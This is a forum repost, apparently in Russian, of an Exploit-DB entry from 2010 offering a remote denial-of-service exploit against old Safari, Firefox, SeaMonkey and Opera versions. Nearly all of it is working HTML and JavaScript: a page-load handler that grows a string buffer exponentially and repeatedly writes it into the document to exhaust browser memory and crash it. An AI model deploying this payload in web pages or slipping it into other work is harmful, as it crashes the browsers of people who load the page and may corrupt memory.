Exploit Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11347
Проверка EDB
  1. Пройдено
Автор
599EME MAN
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-02-07
HTML:
<!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)

Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1

Author : 599eme Man
Contact : [email protected]

-->

<body onload="javascript:DoS();"></body>

<script>

function DoS() {

var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}

}

</script>
 
Источник
www.exploit-db.com

Похожие темы